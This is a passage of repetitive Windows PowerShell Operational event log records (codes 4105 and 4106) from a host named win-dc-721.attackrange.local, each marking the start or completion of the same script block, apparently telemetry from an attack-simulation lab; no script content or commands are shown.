Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469283
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469282
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469281
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469280
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469279
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469278
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469277
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469276
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469275
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469274
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469273
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469272
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469271
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469270
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469269
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469268
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469267
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469266
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469265
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469264
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469263
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469262
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469261
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469260
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469259
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469258
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469257
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469256
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469255
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469254
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469253
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469252
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469251
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469250
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469249
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469248
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469247
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469246
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469245
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469244
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469243
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469242
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469241
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469240
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469239
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469238
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469237
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469236
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469235
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469234
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469233
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469232
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469231
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469230
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469229
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
